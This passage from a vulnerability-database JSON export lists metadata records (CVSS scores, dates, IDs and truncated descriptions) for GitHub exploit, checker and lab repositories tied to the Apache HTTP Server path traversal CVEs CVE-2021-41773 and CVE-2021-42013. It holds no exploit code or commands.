"bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42013", "CVE-2021-41773"], "modified": "2022-02-20T09:15:02", "id": "8A57FAF6-FC91-52D1-84E0-4CBBAD3F9677", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-02-01T00:00:00", "description": "Apache HTTP Server\n\n What is it?\n -----------\n\n The Apache HT...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-12T22:02:09", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-21T12:52:18", "id": "88EB009A-EEFF-52B7-811D-A8A8C8DE8C81", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-03-14T03:12:43", "description": "# CVE-2021-42013\n## Introduction\nIt was found that the fix for C...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-14T18:00:48", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2022-03-14T01:22:13", "id": "F41EE867-4E63-5259-9DF0-745881884D04", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-02-01T00:00:00", "description": "# apache httpd path traversal checker\n\n\n## 0x00 \u6982\u8ff0\n\n20211005\uff0c\u7f51\u4e0a\u66dd...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-15T10:38:44", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2022-01-31T07:15:01", "id": "1C39E10A-4A38-5228-8334-2A5F8AAB7FC3", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-02-19T12:10:15", "description": "# CVE-2021-41773\n\nThis is the deployment for Apache 2.4.49 which...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-09T05:13:17", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2022-01-05T08:44:20", "id": "F8A7DE57-8F14-5B3C-A102-D546BDD8D2B8", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-03-28T00:56:28", "description": "## RCE exploit both for Apache 2.4.49 (CVE-2021-41773) and 2.4.5...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-26T17:56:25", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2022-03-27T21:52:34", "id": "0C28A0EC-7162-5D73-BEC9-B034F5392847", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-02-19T12:14:33", "description": "# CVE-2021-41773\n\nThis is the deployment for Apache 2.4.49 which...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-09T05:13:17", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2022-01-05T08:44:20", "id": "E59A01BE-8176-5F5E-BD32-D30B009CDBDA", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-04-05T05:34:30", "description": "### Exploit for CVE-2021-41773 and CVE-2021-42013\n**Path travers...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-04T22:07:21", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2022-04-05T05:17:33", "id": "0C47BCF2-EA6F-5613-A6E8-B707D64155DE", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-04-05T15:27:13", "description": "### Spring Cloud Gateway \u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e\n\n> \u8be5\u6f0f\u6d1e\u5bf9\u4e8e\u7ebf\u4e0a\u4e1a\u52a1\u98ce\u9669\u8f83\u9ad8\uff0c\u5207\u52ff\u8fdb\u884c\u672a\u6388\u6743\u626b\u63cf\n\n##...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-04T06:38:26", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Cloud Gateway", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42013", "CVE-2022-22947"], "modified": "2022-04-05T11:49:23", "id": "FF2EF58E-53AA-5B60-9EA1-4B5C29647395", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-03-23T20:32:50", "description": "# CVE-2021-42013\r\n\r\n## Description\r\n\r\nThis script exploits CVE-2...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-08T21:48:40", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2022-03-23T16:46:10", "id": "C879EE66-6B75-5EC8-AA68-08693C6CCAD1", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-04-05T05:34:23", "description": "### Exploit for CVE-2021-41773 and CVE-2021-42013\n**Path travers...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-04T22:07:21", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2022-04-05T05:17:33", "id": "A8616E5E-04F8-56D8-ACB4-32FDF7F66EED", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-03-14T05:28:59", "description": "# CVE-2021-42013\n\nThis is the deployment for Apache 2.4.50 which...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-14T04:08:24", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42013", "CVE-2021-41773"], "modified": "2022-03-14T04:20:42", "id": "495E99E5-C1B0-52C1-9218-384D04161BE4", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-02-19T12:11:27", "description": "# CVE-2021-42013\n\nThis is the deployment for Apache 2.4.50 which...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-25T09:07:00", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2022-01-05T08:38:27", "id": "68A13FF0-60E5-5A29-9248-83A940B0FB02", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-02-01T00:00:00", "description": "# CVE-2021-41773-Playground\nSome docker images to play with CVE-...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-04T22:52:44", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2022-01-11T09:06:38", "id": "86360765-0B1A-5D73-A805-BAE8F1B5D16D", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-02-01T00:00:00", "description": "# CVE-2021-41773|CVE-2021-42013: Path Traversal Zero-Day in Apac...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-06T14:58:27", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-11-07T19:19:39", "id": "A2D97DCC-04C2-5CB1-921F-709AA8D7FD9A", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-04-05T16:27:46", "description": "## \u6f0f\u6d1e\u540d\u79f0\n\nApache \u8fdc\u7a0b\u4ee3\u7801\u6267\u884c \uff08CVE-2021-42013\uff09\n\n## \u6f0f\u6d1e\u63cf\u8ff0\n\nApache HTTP Se...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-12-23T14:46:41", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2022-03-08T16:14:48", "id": "78787F63-0356-51EC-B32A-B9BD114431C3", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-02-01T00:00:00", "description": "# CVE-2021-41773 and CVE-2021-42013 Lab Setup\n\n## Setup \n```\n$ g...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-18T12:01:58", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-12-10T06:09:44", "id": "BF9B0898-784E-5B5E-9505-430B58C1E6B8", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-03-04T01:18:36", "description": "# CVE-2021-41773\n\n## Usage\n\n```bash\ndocker-compose up --build vu...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-27T22:39:58", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2022-03-04T00:11:58", "id": "6CAA7558-723B-5286-9840-4DF4EB48E0AF", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-02-01T00:00:00", "description": "# CVE-2021-41773\n\nA Zeek package which raises notices for Path T...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-08T06:54:27", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-28T05:48:41", "id": "805E6B24-8DF9-51D8-8DF6-6658161F96EA", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-02-28T21:50:54", "description": "# SimplesApachePathTraversal\n\n\n\n<p align=\"center\">\n<a href=\"http...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-13T17:03:56", "type": "githubexploit", "title": "Exploit for Files or Directories Accessible to External Parties in Apache Flink", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": 